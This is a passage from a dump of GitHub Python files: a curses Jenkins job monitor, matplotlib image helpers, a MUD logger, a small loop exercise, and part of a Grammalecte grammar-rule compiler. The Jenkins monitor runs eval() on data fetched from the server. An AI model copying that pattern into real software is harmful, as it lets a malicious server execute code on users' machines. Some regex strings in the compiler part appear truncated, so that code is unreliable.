curses.COLOR_BLACK)\n\tcurses.init_pair(5, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\tcurses.init_pair(6, curses.COLOR_RED, curses.COLOR_BLACK)\n\tcurses.init_pair(7, curses.COLOR_BLACK, curses.COLOR_RED)\n\tcurses.init_pair(8, curses.COLOR_BLACK, curses.COLOR_WHITE)\n\n\tcurses.init_pair(11, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(12, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(13, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(14, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(15, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(16, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\ndef displayGui():\n\n\tcount = 1\n\n\ttry:\n\t\twhile 1:\n\n\t\t\tdrawScreen(count, -1)\n\n\t\t\tif count < 6:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tcount = 1\n\n\t\t\ttime.sleep(1)\n\n\texcept (SystemExit, Exception):\n\t\tcurses.endwin()\n\t\tprint(traceback.format_exc())\n\t\tsys.exit(0)\n\texcept (KeyboardInterrupt):\n\t\tinteractiveLoop()\n\ndef interactiveLoop():\n\n\ttry:\n\t\tfocusRow = 4\n\t\tmyscreen.nodelay(1)\n\t\tdrawScreen(1,focusRow)\n\t\twhile 1:\n\t\t\tc = myscreen.getch()\n\t\t\tif c == ord('w'):\n\t\t\t\tfocusRow = findPrevRowToFocus(focusRow)\n\t\t\t\tdrawScreen(1,focusRow)\n\t\t\tif c == ord('s'):\n\t\t\t\tfocusRow = findNextRowToFocus(focusRow)\n\t\t\t\tdrawScreen(1,focusRow)\n\t\t\tif c == ord('m'):\n\t\t\t\tswitchToMonitor()\n\t\t\tif c == ord('b') and args.u != None and args.p != None:\n\t\t\t\tbuild(focusRow)\n\t\t\t\tswitchToMonitor()\n\t\t\ttime.sleep(0.1)\n\n\texcept (Exception):\n\t\tcurses.endwin()\n\t\tprint(traceback.format_exc())\n\t\tsys.exit(0)\n\texcept (SystemExit, KeyboardInterrupt):\n\t\tcurses.endwin()\n\t\tsys.exit(0)\n\ndef switchToMonitor():\n\tdisplayGui()\n\ndef drawScreen(count, focusRow):\n\trow = 1\n\n\tcreateHeader()\n\tnoticeInteractiveMode(focusRow)\n\n\tfor link in args.l:\n\t\trow = readData(count, link, row, focusRow)\n\n\tmyscreen.refresh()\n\ndef readData(count, link, row, focusRow):\n\n\tdata = getJobs(link);\n\n\trow += 1\n\n\tif windowToSmallToWriteIn(row):\n\t\treturn row;\n\n\taddDescription(data[\"description\"], row);\n\trow += 2\n\n\tfor current in data[\"jobs\"]:\n\n\t\tif windowToSmallToWriteIn(row):\n\t\t\tbreak;\n\n\t\tnameToDisplay = current[\"name\"].strip()\n\t\tcolor = current[\"color\"].strip()\n\t\tcolorCode = getColorCode(color)\n\t\tcolorCode = adjustColor(colorCode, row, focusRow)\n\n\t\tlinks[row] = current[\"url\"]\n\n\t\tcleanLine(row, focusRow)\n\n\t\taddHealthReport(current, row, focusRow)\n\n\t\tmyscreen.addstr(row, 16, nameToDisplay, curses.color_pair(colorCode))\n\n\t\taddStructure(row, focusRow)\n\n\t\taddProgressBar(count, row, nameToDisplay, color, focusRow)\n\n\t\tcreateStatus(row, color, row, focusRow)\n\n\t\taddQuitInstructions(y, focusRow)\n\n\t\trow += 1\n\n\trow += 1;\n\treturn row\n\ndef addStructure(row, focusRow):\n\tmyscreen.addstr(row, 49, \"[\", curses.color_pair(adjustColor(1, row, focusRow)))\n\tmyscreen.addstr(row, 56, \"]\", curses.color_pair(adjustColor(1, row, focusRow)))\n\ndef cleanLine(row, focusRow):\n\tmyscreen.addstr(row, 1, \" \" * (x-2), curses.color_pair(adjustColor(1, row, focusRow)))\n\ndef addHealthReport(current, row, focusRow):\n\n\tif x > 119:\n\t\tmyscreen.addstr(row, 58, \" \" * (x-59), curses.color_pair(adjustColor(4, row, focusRow)))\n\t\tmyscreen.addstr(row, 58, current[\"healthReport\"][0][\"description\"], curses.color_pair(adjustColor(4, row, focusRow)))\n\ndef addDescription(description, row):\n\n\t# Set standard 
description if Jenkins doesn't provide one\n\tif description is None:\n\t\tdescription = \"Jenkins\"\n\n\t# We just allow 1 line of description\n\tdescription = description.split('\\n')[0]\n\n\t# If the description is too long, cut off the end\n\tif (x-2) < len(description):\n\t\tdescription = description[:(x-10)]\n\t\tdescription += \" (...)\"\n\n\tmyscreen.addstr(row, 2, description, curses.color_pair(1))\n\ndef addProgressBar(count, row, nameToDisplay, color, focusRow):\n\n\tif \"anime\" in color:\n\t\tprogressBar = createProgressBar(count);\n\t\tmyscreen.addstr(row, 50, progressBar, curses.color_pair(adjustColor(3, row, focusRow)))\n\telse:\n\t\tmyscreen.addstr(row, 50, \" \" * 6, curses.color_pair(adjustColor(3, row, focusRow)))\n\ndef createProgressBar(count):\n\n\tresult = \"|\" * count\n\tspace = \" \" * (6-count)\n\tresult = result+space\n\treturn result\n\ndef addQuitInstructions(y, focusRow):\n\tif focusRow == -1:\n\t\tmyscreen.addstr(y-2, 1, \" \" * (x-2), curses.color_pair(1))\n\t\tmyscreen.addstr(y-2, 2, \"Press ctrl+C to interact!\")\n\telse:\n\t\tmyscreen.addstr(y-2, 1, \" \" * (x-2), curses.color_pair(8))\n\n\t\tif args.u != None and args.p != None:\n\t\t\tmyscreen.addstr(y-2, 2, \"ctrl+C: quit | w: up | s: down | b: build | m: monitor\",curses.color_pair(8))\n\t\telse:\n\t\t\tmyscreen.addstr(y-2, 2, \"ctrl+C: quit | m: monitor | build: requires auth\",curses.color_pair(8))\n\ndef windowToSmallToWriteIn(row):\n\n\tif row >= (y-3):\n\t\tif x > 50:\n\t\t\tmyscreen.addstr(y-2, 23, \" (Can't show all data. Too small window)\", curses.color_pair(6))\n\t\telse:\n\t\t\tmyscreen.addstr(y-3, 2, \"(Can't show all data. Too small window)\", curses.color_pair(6))\n\t\treturn 1\n\n\treturn 0\n\ndef createStatus(y, color, row, focusRow):\n\n\tif \"blue\" in color:\n\t\tmyscreen.addstr(y, 2, \"    [ OK ]\", curses.color_pair(adjustColor(2, row, focusRow)))\n\telif \"disabled\" in color:\n\t\tmyscreen.addstr(y, 2, \"[ DISABLED ]\", curses.color_pair(adjustColor(4, row, focusRow)))\n\telif \"yellow\" in color:\n\t\tmyscreen.addstr(y, 2, \"[ UNSTABLE ]\", curses.color_pair(adjustColor(5, row, focusRow)))\n\telif \"red\" in color:\n\t\tmyscreen.addstr(y, 2, \"  [ FAILED ]\", curses.color_pair(adjustColor(6, row, focusRow)))\n\ndef getColorCode(color):\n\n\tif \"blue\" in color:\n\t\treturn 2\n\telif \"disabled\" in color:\n\t\treturn 4\n\telif \"yellow\" in color:\n\t\treturn 5\n\telif \"red\" in color:\n\t\treturn 6\n\ndef build(focusRow):\n\tif focusRow in links.keys():\n\t\trequest = Request(links[focusRow] + \"/build/\")\n\t\tbase64string = base64.encodestring(('%s:%s' % (args.u, args.p)).encode()).decode().replace('\\n', '')\n\t\trequest.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\t\turlopen(request, data=b\"\");\n\ndef getJobs(link):\n\t# NOTE: eval() of a remote response is risky; the Jenkins python API returns a dict literal.\n\tif args.u != None and args.p != None:\n\t\trequest = Request(link + \"/api/python?depth=1&pretty=true\")\n\t\tbase64string = base64.encodestring(('%s:%s' % (args.u, args.p)).encode()).decode().replace('\\n', '')\n\t\trequest.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\t\treturn eval(urlopen(request).read());\n\telse:\n\t\treturn eval(urlopen(link + \"/api/python?depth=1&pretty=true\").read());\n\n\ndef findNextRowToFocus(oldRow):\n\n\tif list(links).index(oldRow) == len(links.keys())-1:\n\t\treturn list(links)[0]  # dict_keys is not subscriptable in Python 3\n\n\treturnNext = 0\n\n\tfor key in links.keys():\n\t\tif returnNext == 1:\n\t\t\treturn key\n\t\tif oldRow == key:\n\t\t\treturnNext = 1\n\ndef findPrevRowToFocus(oldRow):\n\n\tif list(links).index(oldRow) == 0:\n\t\treturn 
list(links)[-1]  # dict_keys is not subscriptable in Python 3\n\n\tprevValue = 0\n\n\tfor key in links.keys():\n\t\tif oldRow == key:\n\t\t\treturn prevValue\n\t\tprevValue = key\n\ndef adjustColor(colorCode, row, focusRow):\n\n\tif focusRow == row:\n\t\treturn colorCode + 10\n\telse:\n\t\treturn colorCode\n\n\ninit();\n\ndisplayGui()\n","repo_name":"mariushe/cjenkins","sub_path":"cjenkins.py","file_name":"cjenkins.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"67"} +{"seq_id":"42931992881","text":"\"\"\"\nCreated by Dan on 08/16/16.\nThis one contains all the plt-based graphic functions shared among all the functions.\nLast update: 09/30/18\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef mip_stack(img_stack, rot_axis = 'x', rot_angle = 0):\n    '''\n    create a max intensity projection of the input image stack.\n    Only the unrotated case is implemented; a nonzero rot_angle\n    raises NotImplementedError instead of silently returning None.\n    '''\n    NZ, NY, NX = img_stack.shape\n    if rot_angle == 0:\n        return img_stack.max(axis = 0)\n    raise NotImplementedError(\"rotation before projection is not implemented yet\")\n\n\ndef image_scale_bar(fig_im, location, sc_length = 20., pxl_size = 0.295):\n    \"\"\"\n    fig: current figure handle\n    question: should I pass a figure or a figure axes?\n    pxl_size: the pixel size of the image, unit: micron\n    location: the center of the scale bar. unit: px\n    sc_length: scale bar length, unit: micron.\n    default width of the scale bar: 10 px\n    \"\"\"\n    ax = fig_im.get_axes()[0]\n    h_sc = 0.5*sc_length/pxl_size\n\n    xs = [location[1] - h_sc, location[1]+ h_sc]\n    ys = [location[0], location[0]]\n    ax.plot(xs, ys, '-w', linewidth = 10)\n    # done with image_scale_bar\n\n\n\ndef image_zoom_frame(fig_im, c_nw, c_se, cl = 'w'):\n    \"\"\"\n    frame a rectangular area out from an imshow() image. 
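Corners are (row, col) pairs; 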
default: white dashed line\n OK this works.\n \"\"\"\n ax = fig_im.get_axes()[0]\n y1, x1 = c_nw # northwest corner coordinate\n y2, x2 = c_se # southeast corner coordinate\n ax.plot([x1,x1], [y1, y2], '--', color = cl)\n ax.plot([x1,x2], [y1, y1], '--', color = cl)\n ax.plot([x2,x2], [y1, y2], '--', color = cl)\n ax.plot([x1,x2], [y2, y2], '--', color = cl)\n # done with image_zoom_frame\n\n\n\ndef slice_display(slice_blobs, title = None, ref_image = None, s_diag = 15):\n '''\n slice_blobs: a 2-D array specifying the cell coordinates\n ref_image: a 2-D array specifying the reference image.\n Adding multi-slice plotting:\n '''\n if ref_image is None:\n figd = plt.figure(figsize= (6.,4.) )\n ax = figd.add_subplot(111)\n else:\n ny, nx = ref_image.shape\n figd = plt.figure(figsize = (6., 6.*ny/nx))\n ax = figd.add_subplot(111)\n ax.imshow(ref_image, cmap = 'Greys_r')\n ax.set_xlim([0,nx])\n ax.set_ylim([0,ny])\n\n if isinstance(slice_blobs, list):\n ii = 0\n NS = len(slice_blobs)\n for fr in slice_blobs:\n ax.scatter(fr[:,1], fr[:,0], edgecolors = global_ccode[ii], facecolors = 'none', s = s_diag)\n ii+=1\n else:\n ax.scatter(slice_blobs[:,1], slice_blobs[:,0], c='g', s = s_diag, facecolors = 'none')\n\n ax.set_title(title, fontsize = 14)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n figd.tight_layout()\n return figd\n\n\ndef slices_compare(im_slice1, im_slice2, title_1 = None, title_2 = None, fh = 3.):\n '''\n imshow two slices side by side.\n '''\n y1, x1 = im_slice1.shape\n y2, x2 = im_slice2.shape\n\n figc = plt.figure(figsize = (2*(x1+x2)/(y1+y2)*fh, fh))\n ax1 = figc.add_subplot(121)\n ax2 = figc.add_subplot(122)\n ax1.imshow(im_slice1, cmap = 'Greys_r')\n ax1.set_xlim([0, x1])\n ax1.set_ylim([0, y1])\n ax1.get_xaxis().set_visible(False)\n ax1.get_yaxis().set_visible(False)\n if title_1 is not None:\n ax1.set_title(title_1, fontsize = 13)\n\n ax2.imshow(im_slice2, cmap = 'Greys_r')\n ax2.set_xlim([0, x2])\n ax2.set_ylim([0, y2])\n ax2.get_xaxis().set_visible(False)\n ax2.get_yaxis().set_visible(False)\n if title_2 is not None:\n ax2.set_title(title_2, fontsize = 13)\n\n figc.tight_layout()\n return figc\n\n\n\ndef stack_display(zstack_3d, cl = 'b'):\n '''\n display a z-distribution of a stack\n column conventions: 0 -- z; 1 -- y; 2 -- x\n '''\n zs, ys, xs = zstack_3d[:,0], zstack_3d[:,1], zstack_3d[:,2]\n fig3d = plt.figure(figsize= (10,10))\n ax = fig3d.add_subplot(111, projection = '3d')\n ax.scatter(xs, ys, zs, c = cl, depthshade = True)\n ax.set_xlabel('Anterior -- Posterior', fontsize = 14)\n ax.set_ylabel('Left -- Right', fontsize = 14)\n ax.set_zlabel('Ventral--Dorsal', fontsize = 14)\n fig3d.tight_layout()\n return fig3d\n\n\n","repo_name":"danustc/CalAnalyzer","sub_path":"calanalyzer/visualization/image_display.py","file_name":"image_display.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10858498803","text":"import datetime\nimport time\nimport traceback\n\n# Variables shared between all Logger instances.\n_LOGFILE = None\n_LOGLEVEL = None\n_STDOUT = None\n_WAITONCRITICAL = None\n\n\ndef init(config):\n \"\"\"Initialize the Logger system.\n \n This must be run before creating any Logger instances.\n It sets up global variables that are shared between all Loggers.\n \"\"\"\n global _LOGFILE, _LOGLEVEL, _STDOUT, _WAITONCRITICAL\n\n # Note that we are initializing the logger.\n print(\"Initializing logger...\")\n\n # On singleuser, we might wait 
\n\n","repo_name":"danustc/CalAnalyzer","sub_path":"calanalyzer/visualization/image_display.py","file_name":"image_display.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10858498803","text":"import datetime\nimport time\nimport traceback\n\n# Variables shared between all Logger instances.\n_LOGFILE = None\n_LOGLEVEL = None\n_STDOUT = None\n_WAITONCRITICAL = None\n\n\ndef init(config):\n \"\"\"Initialize the Logger system.\n\n This must be run before creating any Logger instances.\n It sets up global variables that are shared between all Loggers.\n \"\"\"\n global _LOGFILE, _LOGLEVEL, _STDOUT, _WAITONCRITICAL\n\n # Note that we are initializing the logger.\n print(\"Initializing logger...\")\n\n # On singleuser, we might wait on critical errors.\n if \"wait_on_critical\" in config[\"log\"]:\n _WAITONCRITICAL = config[\"log\"][\"wait_on_critical\"]\n\n # Make sure the chosen log level is valid. Otherwise force the highest log level.\n if config[\"log\"][\"level\"] not in [\"critical\", \"error\", \"warn\", \"info\", \"debug\"]:\n print(timestamp(), \"[logger#error] Invalid log level in config, defaulting to \\\"debug\\\".\")\n config[\"log\"][\"level\"] = \"debug\"\n _LOGLEVEL = config[\"log\"][\"level\"]\n\n # For the server, give an error if no logging option is selected, and default to stdout.\n # On singleuser, stdout is always enabled.\n if \"stdout\" in config[\"log\"]:\n if not config[\"log\"][\"stdout\"] and not config[\"log\"][\"file\"]:\n # No logging target is set, so force stdout.\n print(timestamp(), \"[logger#error] No logging target in config, defaulting to stdout.\")\n config[\"log\"][\"stdout\"] = True\n _STDOUT = True\n elif config[\"log\"][\"stdout\"]:\n _STDOUT = True\n else:\n _STDOUT = True\n\n # Try to open the log file. If this fails, give an error and default to stdout.\n if config[\"log\"][\"file\"]:\n try:\n _LOGFILE = open(config[\"log\"][\"file\"], 'a')\n except OSError:\n if _LOGLEVEL in [\"debug\", \"info\", \"warn\", \"error\"]:\n print(timestamp(), \"[logger#error] Could not open log file: {0}\".format(\n config[\"log\"][\"file\"]))\n print(traceback.format_exc(1))\n if \"stdout\" in config[\"log\"]:\n config[\"log\"][\"stdout\"] = True\n _STDOUT = True\n\n # Note that we have finished initializing the logger.\n if _LOGLEVEL in [\"debug\", \"info\"]:\n if _STDOUT:\n print(timestamp(), \"[logger#info] Finished initializing logger.\")\n if _LOGFILE:\n _LOGFILE.write(timestamp() + \" [logger#info] Finished initializing logger.\\n\")\n\n\ndef timestamp():\n \"\"\"Return a Log timestamp.\n\n :return: Timestamp string.\n \"\"\"\n # Thanks to https://stackoverflow.com/questions/3168096/getting-computers-utc-offset-in-python\n is_dst = time.daylight and time.localtime().tm_isdst > 0\n utc_offset = - (time.altzone if is_dst else time.timezone)\n return \"{0}{1}\".format(datetime.datetime.now().isoformat(), str(int(utc_offset / 3.6)))\n\n\nclass Logger:\n \"\"\"Logger.\n\n Logs to STDOUT, and optionally to a file, and filters unwanted messages based on a log level setting.\n Each Logger instance can have its own namespace for which it tags messages.\n \"\"\"\n def __init__(self, namespace):\n \"\"\"Logger Initializer.\n\n :param namespace: The name of the subsystem this Logger instance is logging for.\n \"\"\"\n self._namespace = namespace\n\n def debug(self, msg, **kwargs):\n \"\"\"Write a debug level message to the console and/or the log file.\n \"\"\"\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _LOGLEVEL in [\"debug\"]:\n if _STDOUT:\n print(\"{0} [{1}#debug] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#debug] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def info(self, msg, **kwargs):\n \"\"\"Write an info level message to the console and/or the log file.\n \"\"\"\n if _LOGLEVEL in [\"debug\", \"info\"]:\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _STDOUT:\n print(\"{0} [{1}#info] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#info] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def warn(self, msg, **kwargs):\n \"\"\"Write a warn level message to the console and/or the log file.\n \"\"\"\n if _LOGLEVEL in [\"debug\", \"info\",
\"warn\"]:\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _STDOUT:\n print(\"{0} [{1}#warn] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#warn] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def error(self, msg, **kwargs):\n \"\"\"Write an error level message to the console and/or the log file.\n \"\"\"\n if _LOGLEVEL in [\"debug\", \"info\", \"warn\", \"error\"]:\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _STDOUT:\n print(\"{0} [{1}#error] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#error] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def critical(self, msg, **kwargs):\n \"\"\"Write a critical level message to the console and/or the log file.\n\n All log levels include critical, so these messages cannot be disabled.\n \"\"\"\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n print(\"{0} [{1}#critical] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#critical] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n # Be nice to Windows users who ran the program by double-clicking. :)\n if _WAITONCRITICAL:\n input(\"Press Enter Key to Continue...\")\n\n def write(self, msg):\n \"\"\"Write an untagged message to the console and/or the log file, regardless of log level.\n \"\"\"\n print(msg)\n if _LOGFILE:\n _LOGFILE.write(\"{0} {1}\\n\".format(timestamp(), msg))\n","repo_name":"seisatsu/DennisMUD","sub_path":"lib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"67"} +{"seq_id":"41762095599","text":"\n\n# for letter in 'Mike Daniels':\n# print(letter)\n\n# prices = [10, 20, 30]\n# total = 0\n#\n# for price in prices:\n# total += price\n#\n# print(f'Total: {total}')\n\n# Exercise\nnumbers = [2, 2, 2, 2, 2, 8]\n\nfor num in numbers:\n print('x' * num)\n","repo_name":"Umar9292/python_practice","sub_path":"for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72169657814","text":"\nimport re\nimport sys\nimport traceback\nimport copy\nimport json\nfrom distutils import file_util\n\nfrom grammalecte.echo import echo\n\n\nDEF = {}\nFUNCTIONS = []\n\nJSREGEXES = {}\n\nWORDLIMITLEFT = r\"(?= 0)\", sCode)\n sCode = re.sub(\".search\\\\(/\\\\(\\\\?i\\\\)([^/]+)/\\\\) >= 0\\\\)\", \".search(/\\\\1/i) >= 0)\", sCode)\n sCode = re.sub('(look\\\\(sx?[][.a-z:()]*), \"\\\\(\\\\?i\\\\)([^\"]+)\"', \"\\\\1, /\\\\2/i\", sCode)\n sCode = re.sub('(look\\\\(sx?[][.a-z:()]*), \"([^\"]+)\"', \"\\\\1, /\\\\2/\", sCode)\n sCode = re.sub('(look_chk1\\\\(dDA, sx?[][.a-z:()]*, [0-9a-z.()]+), \"\\\\(\\\\?i\\\\)([^\"]+)\"', \"\\\\1, /\\\\2/i\", sCode)\n sCode = re.sub('(look_chk1\\\\(dDA, sx?[][.a-z:()]*, [0-9a-z.()]+), \"([^\"]+)\"', \"\\\\1, /\\\\2/i\", sCode)\n sCode = sCode.replace(\"(? 
lists\n sCode = re.sub(\"\\((m\\.start\\[\\\\d+\\], m\\[\\\\d+\\])\\)\", \"[\\\\1]\", sCode)\n # regex\n sCode = sCode.replace(\"\\w[\\w-]+\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st][a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st-]+\")\n sCode = sCode.replace(r\"/\\w/\", \"/[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st]/\")\n sCode = sCode.replace(r\"[\\w-]\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st-]\")\n sCode = sCode.replace(r\"[\\w,]\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st,]\")\n return sCode\n\n\ndef uppercase (s, sLang):\n \"(flag i is not enough): converts regex to uppercase regex: 'foo' becomes '[Ff][Oo][Oo]', but 'Bar' becomes 'B[Aa][Rr]'.\"\n sUp = \"\"\n nState = 0\n for i in range(0, len(s)):\n c = s[i]\n if c == \"[\":\n nState = 1\n if nState == 1 and c == \"]\":\n nState = 0\n if c == \"<\" and i > 3 and s[i-3:i] == \"(?P\":\n nState = 2\n if nState == 2 and c == \">\":\n nState = 0\n if c == \"?\" and i > 0 and s[i-1:i] == \"(\" and s[i+1:i+2] != \":\":\n nState = 5\n if nState == 5 and c == \")\":\n nState = 0\n if c.isalpha() and c.islower() and nState == 0:\n if c == \"i\" and (sLang == \"tr\" or sLang == \"az\"):\n sUp += \"[İ\" + c + \"]\"\n else:\n sUp += \"[\" + c.upper() + c + \"]\"\n elif c.isalpha() and c.islower() and nState == 1 and s[i+1:i+2] != \"-\":\n if s[i-1:i] == \"-\" and s[i-2:i-1].islower(): # [a-z] -> [a-zA-Z]\n sUp += c + s[i-2:i-1].upper() + \"-\" + c.upper()\n elif c == \"i\" and (sLang == \"tr\" or sLang == \"az\"):\n sUp += \"İ\" + c\n else:\n sUp += c.upper() + c\n else:\n sUp += c\n if c == \"\\\\\":\n nState = 4\n elif nState == 4:\n nState = 0\n return sUp\n\n\ndef countGroupInRegex (sRegex):\n try:\n return re.compile(sRegex).groups\n except:\n traceback.print_exc()\n echo(sRegex)\n return 0\n\n\ndef createRule (s, nIdLine, sLang, bParagraph):\n \"returns rule as list [option name, regex, bCaseInsensitive, identifier, list of actions]\"\n global JSREGEXES\n\n #### OPTIONS\n sLineId = str(nIdLine) + (\"p\" if bParagraph else \"s\")\n sRuleId = sLineId\n sOption = False # False or [a-z0-9]+ name\n tGroups = None # code for groups positioning (only useful for JavaScript)\n cCaseMode = 'i' # i: case insensitive, s: case sensitive, u: uppercasing allowed\n cWordLimitLeft = '[' # [: word limit, <: no specific limit\n cWordLimitRight = ']' # ]: word limit, >: no specific limit\n m = re.match(\"^__([[<]\\\\w[]>])(/[a-zA-Z0-9]+|)(\\\\(\\\\w+\\\\)|)__ *\", s)\n if m:\n cWordLimitLeft = m.group(1)[0]\n cCaseMode = m.group(1)[1]\n cWordLimitRight = m.group(1)[2]\n sOption = m.group(2)[1:] if m.group(2) else False\n if m.group(3):\n sRuleId = m.group(3)[1:-1]\n s = s[m.end(0):]\n else:\n echo(\"Warning. 
No option defined at line: \" + sLineId)\n\n #### REGEX TRIGGER\n i = s.find(\" <<-\")\n if i == -1:\n print(\"# Error: no condition at line \" + sLineId)\n return None\n sRegex = s[:i].strip()\n s = s[i+4:]\n \n # JS groups positioning codes\n m = re.search(\"@@\\\\S+\", sRegex)\n if m:\n tGroups = groupsPositioningCodeToList(sRegex[m.start()+2:])\n sRegex = sRegex[:m.start()].strip()\n # JS regex\n m = re.search(\".+i?\", sRegex)\n if m:\n JSREGEXES[sLineId] = m.group(0)\n sRegex = sRegex[:m.start()].strip()\n if \"\" in sRegex or \"\" in sRegex:\n print(\"# Error: JavaScript regex not delimited at line \" + sLineId)\n return None\n\n # quotes ?\n if sRegex.startswith('\"') and sRegex.endswith('\"'):\n sRegex = sRegex[1:-1]\n\n ## definitions\n for sDef, sRepl in DEF.items():\n sRegex = sRegex.replace(sDef, sRepl)\n\n ## count number of groups (must be done before modifying the regex)\n nGroup = countGroupInRegex(sRegex)\n if nGroup > 0:\n if not tGroups:\n print(\"# warning: groups positioning code for JavaScript should be defined at line \" + sLineId)\n else:\n if nGroup != len(tGroups):\n print(\"# error: groups positioning code irrelevant at line \" + sLineId)\n\n ## word limit\n if cWordLimitLeft == '[' and not sRegex.startswith((\"^\", '’', \"'\", \",\")):\n sRegex = WORDLIMITLEFT + sRegex\n if cWordLimitRight == ']' and not sRegex.endswith((\"$\", '’', \"'\", \",\")):\n sRegex = sRegex + WORDLIMITRIGHT\n\n ## casing mode\n if cCaseMode == \"i\":\n bCaseInsensitive = True\n if not sRegex.startswith(\"(?i)\"):\n sRegex = \"(?i)\" + sRegex\n elif cCaseMode == \"s\":\n bCaseInsensitive = False\n sRegex = sRegex.replace(\"(?i)\", \"\")\n elif cCaseMode == \"u\":\n bCaseInsensitive = False\n sRegex = sRegex.replace(\"(?i)\", \"\")\n sRegex = uppercase(sRegex, sLang)\n else:\n print(\"# Unknown case mode [\" + cCaseMode + \"] at line \" + sLineId)\n\n ## check regex\n try:\n z = re.compile(sRegex)\n except:\n print(\"# Regex error at line \", nIdLine)\n echo(sRegex)\n traceback.print_exc()\n return None\n ## groups in non grouping parenthesis\n for x in re.finditer(\"\\(\\?:[^)]*\\([[\\w -]\", sRegex):\n print(\"# Warning: groups inside non grouping parenthesis in regex at line \" + sLineId)\n\n #### PARSE ACTIONS\n lActions = []\n nAction = 1\n for sAction in s.split(\" <<- \"):\n t = createAction(sLineId + \"_\" + str(nAction), sAction, nGroup)\n nAction += 1\n if t:\n lActions.append(t)\n if not lActions:\n return None\n\n return [sOption, sRegex, bCaseInsensitive, sLineId, sRuleId, lActions, tGroups]\n\n\ndef createAction (sIdAction, sAction, nGroup):\n \"returns an action to perform as a tuple (condition, action type, action[, iGroup [, message, URL ]])\"\n global FUNCTIONS\n\n m = re.search(r\"([-~=>])(\\d*|)>>\", sAction)\n if not m:\n echo(\"# No action at line \" + sIdAction)\n return None\n\n #### CONDITION\n sCondition = sAction[:m.start()].strip()\n if sCondition:\n sCondition = prepareFunction(sCondition)\n FUNCTIONS.append((\"c\"+sIdAction, sCondition))\n for x in re.finditer(\"[.](?:group|start|end)[(](\\d+)[)]\", sCondition):\n if int(x.group(1)) > nGroup:\n print(\"# Error in groups in condition at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n if \".match\" in sCondition:\n echo(\"# Error. JS compatibility. 
Don't use .match() in condition, use .search()\")\n sCondition = \"c\"+sIdAction\n else:\n sCondition = None\n\n #### iGroup / positioning\n iGroup = int(m.group(2)) if m.group(2) else 0\n if iGroup > nGroup:\n echo(\"# Selected group > group number in regex at line \" + sIdAction)\n \n #### ACTION\n sAction = sAction[m.end():].strip()\n cAction = m.group(1)\n if cAction == \"-\":\n ## error\n iMsg = sAction.find(\" # \")\n sMsg = sAction[iMsg+3:].strip()\n sAction = sAction[:iMsg].strip()\n sURL = \"\"\n mURL = re.search(\"[|] *(https?://.*)\", sMsg)\n if mURL:\n sURL = mURL.group(1).strip()\n sMsg = sMsg[:mURL.start(0)].strip()\n if sMsg[0:1] == \"=\":\n sMsg = prepareFunction(sMsg[1:])\n FUNCTIONS.append((\"m\"+sIdAction, sMsg))\n for x in re.finditer(\"group[(](\\d+)[)]\", sMsg):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in message at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n sMsg = \"=m\"+sIdAction\n else:\n for x in re.finditer(r\"\\\\(\\d+)\", sMsg):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in message at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n if re.search(\"[.]\\\\w+[(]\", sMsg):\n print(\"# error in message at line \" + sIdAction + \": This message looks like code. Line should begin with =\")\n \n if sAction[0:1] == \"=\" or cAction == \"=\":\n if \"define\" in sAction and not re.search(r\"define\\(\\\\\\d+ *, *\\[.*\\] *\\)\", sAction):\n print(\"# error in action at line \" + 